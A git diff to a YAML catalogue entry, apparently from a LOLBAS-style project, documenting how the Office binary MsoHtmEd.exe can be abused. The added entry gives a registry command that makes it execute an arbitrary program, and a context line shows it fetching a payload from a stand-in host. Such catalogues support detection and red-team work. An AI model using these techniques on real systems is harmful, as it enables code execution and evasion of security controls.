diff --git a/yml/OtherMSBinaries/MsoHtmEd.yml b/yml/OtherMSBinaries/MsoHtmEd.yml index fb2ac30..74dad51 100644 --- a/yml/OtherMSBinaries/MsoHtmEd.yml +++ b/yml/OtherMSBinaries/MsoHtmEd.yml @@ -4,6 +4,13 @@ Description: Microsoft Office component Author: Nir Chako Created: 2022-07-24 Commands: + - Command: MsoHtmEd.exe https://any-valid-link-to-download-any-html-file-from.com + Description: Execute a command line from the registry + Usecase: Set this registry key with the desired commaned you want to trigger - reg add "HKCU\SOFTWARE\Microsoft\Shared\HTML\Default Editor\shell\edit\command" /f /t REG_SZ /d "calc.exe" + Category: Execute + Privileges: User + MitreID: T1218 + OperatingSystem: Windows 10, Windows 11 - Command: MsoHtmEd.exe https://example.com/payload Description: Downloads payload from remote server Usecase: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)